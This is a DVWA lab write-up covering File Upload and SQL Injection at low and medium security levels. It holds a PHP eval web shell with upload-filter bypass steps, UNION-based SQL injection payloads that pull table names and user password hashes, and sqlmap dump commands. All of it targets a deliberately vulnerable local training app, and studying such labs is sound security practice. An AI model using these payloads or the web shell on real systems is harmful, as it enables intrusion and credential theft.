DVWA WriteUp
Pub Date: 2023-10-16
http://127.0.0.1/dvwa/login.php
Default credentials — username: admin, password: password
File Upload
Low level
Upload eval.php directly (no server-side checks are applied), then connect to it with AntSword (蚁剑). Optionally enumerate the upload directory first:
feroxbuster --url http://127.0.0.1/dvwa/vulnerabilities/upload -H "Cookie: security=low; PHPSESSID=<your session>"
(sudo is not required; the URL needs its scheme, and without the logged-in DVWA cookies the requests are likely to be redirected to login.php instead of reaching the module.)
eval.php
<?php @eval($_POST['attack']) ?>
http://127.0.0.1/dvwa/vulnerabilities/upload/../../hackable/uploads/eval.php
(the ../../ normalises away, i.e. the shell is served from http://127.0.0.1/dvwa/hackable/uploads/eval.php)
Open AntSword → Add data: URL = the shell path above, connection password = attack (the $_POST key that eval() reads).
Medium level
Upload the same eval.php, but this time intercept the upload request with Burp:
<?php @eval($_POST['attack']) ?>
In the intercepted multipart part for the file, change its Content-Type header to image/png (keep the .php filename and the PHP body). The medium-level check trusts this client-supplied MIME type rather than inspecting the file, which is why the upload now succeeds.
Then connect with AntSword exactly as before:
http://127.0.0.1/dvwa/vulnerabilities/upload/../../hackable/uploads/eval.php
(resolves to http://127.0.0.1/dvwa/hackable/uploads/eval.php)
Open AntSword → Add data: URL = the shell path above, connection password = attack.
SQL Injection
View the module's source for all security levels:
http://127.0.0.1/dvwa/vulnerabilities/view_source_all.php?id=sqli
Low level
<?php
// DVWA "SQL Injection" module, security level LOW. Shown for reference: the
// payloads that follow are written against exactly this query.
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
// $_REQUEST merges GET, POST and cookie values, so the payload can be sent as a
// URL parameter (?id=...&Submit=Submit) or in a POST body.
$id = $_REQUEST[ 'id' ];
// Check database
// VULNERABLE: $id is interpolated verbatim into a single-quoted SQL literal.
// A payload beginning with ' closes that literal, and a trailing # comments
// out the remaining  ';  — there is no escaping or parameterisation at all.
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
// On a query error the raw mysqli error text is sent back to the client, which
// is why syntax or collation problems show up verbatim in the browser.
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
// Every row the (possibly UNIONed) query yields is printed, so extra rows from
// a UNION SELECT appear directly in the page.
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
// $id and the column values are echoed without htmlspecialchars(), so
// attacker-controlled strings in a UNION row are rendered as HTML as well.
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
Always-true condition
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' or 0=0#
$query = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0#';";
Because 0=0 is always true, every row of users is returned (first and last name of each). Note that user_id = '%' is an exact comparison (=, not LIKE), so the % is not a wildcard here — any character would do; the # comments out the trailing ';.
Display the database version (a UNION must match the original SELECT's column count — two — so pad the other column with null or 1)
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' or 0=0 union select null, version() #
$query = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, version() #;";
Or, equivalently, with the value in the first column instead:
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select @@version,1 #;
display database user
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' or 0=0 union select null, user() #
$query = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, user() #;";
Or, equivalently, with the value in the first column instead:
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select user(),1 #;
display database name
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' or 0=0 union select null, database() #
$query = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, database() #;";
Or, equivalently, with the value in the first column instead (note: database(), not user()):
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select database(),1 #;
Display all table names from information_schema. The `and 1=0` makes the original WHERE false so only the UNION rows are shown; the COLLATE clause avoids a collation-mismatch error between information_schema columns and the users table.
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' and 1=0 union select null, table_name COLLATE utf8_general_ci from information_schema.tables #
Resulting query (only the part after the opening quote is attacker-controlled, so the COLLATE belongs in the UNION branch, not on last_name):
SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0
union
select null, table_name COLLATE utf8_general_ci from information_schema.tables#';
Display tables whose name starts with "user" (LIKE is case-insensitive under this collation, so information_schema's own USER_* tables match too; add `and table_schema=database()` to restrict the list to the dvwa schema)
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' and 1=0 union select null, table_name COLLATE utf8_general_ci from information_schema.tables where table_name like 'user%'#
Resulting query:
SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0
union
select null, table_name COLLATE utf8_general_ci from information_schema.tables where table_name like 'user%'#';
Dump the interesting columns of the users table (first_name, last_name, user, password), concatenated into one value so they fit the two-column UNION
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
$query = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #;";
# 0x0a is a line feed (newline), not a space — it separates the concatenated values inside the <pre> block
Resulting query:
SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0
union
select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users#';
Medium level — the form now submits via POST (see `$_POST` in the source below), so send the payloads as request bodies with Burp or curl:
<?php
// DVWA "SQL Injection" module, security level MEDIUM.
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
// Only POST is accepted here, so payloads must go in the request body
// (Burp Repeater, curl --data, ...).
$id = $_POST[ 'id' ];
// mysqli_real_escape_string() backslash-escapes ' " \ NUL \n \r and Ctrl-Z.
// The trigger_error() branch only runs if no connection object exists.
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
// VULNERABLE: the escaped value is interpolated UNQUOTED into a numeric
// comparison. Escaping quotes is irrelevant because no quote is needed to
// break out — "-1 UNION SELECT ..." is valid as-is. String arguments just have
// to avoid quote characters (e.g. hex literals such as 0x64767761 for 'dvwa').
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
// Raw mysqli error text is echoed on failure — handy feedback while tuning
// a payload.
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
// The escaping only added backslashes; < and > are untouched and nothing is
// passed through htmlspecialchars(), so the echoed values can still carry HTML.
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
//mysql_close();
}
?>
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
Get the database name. $id is unquoted in the query, so no quote character is needed to break out (mysqli_real_escape_string only neutralises quotes); just keep the payload quote-free. The -1 makes the original WHERE match nothing, so only the UNION row is displayed. Do not leave a space before the & in the body:
id=-1 UNION SELECT 1,DATABASE()&Submit=Submit
Get the tables of the database. String literals would need quotes (which get escaped), so encode them as MySQL hex literals instead — note the 0x prefix, which Python's .hex() does not add:
"base table".encode("utf-8").hex()   # 62617365207461626c65  -> 0x62617365207461626c65
"dvwa".encode("utf-8").hex()         # 64767761              -> 0x64767761
id=-1 UNION SELECT 1,table_name FROM information_schema.tables WHERE table_type=0x62617365207461626c65 AND table_schema=0x64767761&Submit=Submit
(information_schema stores table_type as 'BASE TABLE'; the lowercase hex value still matches because the comparison is case-insensitive. table_schema=DATABASE() also works and avoids the hex encoding.)
Get the columns of the users table:
"users".encode("utf-8").hex()   # 7573657273 -> 0x7573657273
id=-1 UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name=0x7573657273 #&Submit=Submit
Get user and password from the users table:
id=-1 UNION SELECT user, password FROM users #&Submit=Submit
(The trailing # is optional here — the injected SELECT already ends cleanly at the original ';'. If you keep it, send it as %23 in the POST body so no URL-aware tool treats it as a fragment.)
SQL Injection (Blind) — no query output is reflected, so automate the inference (boolean/time-based) with sqlmap:
sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="security=medium; PHPSESSID=sksah6ltdoh1c20mtoi5q6q5fb" --data="id=1&Submit=Submit" -p id --dbs
sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="security=medium; PHPSESSID=sksah6ltdoh1c20mtoi5q6q5fb" --data="id=1&Submit=Submit" -p id -D dvwa -T users --batch --threads 5 --dump
(Replace PHPSESSID with your own logged-in session value; the security cookie selects the level. -D dvwa names the schema explicitly instead of letting sqlmap fall back to a guess.)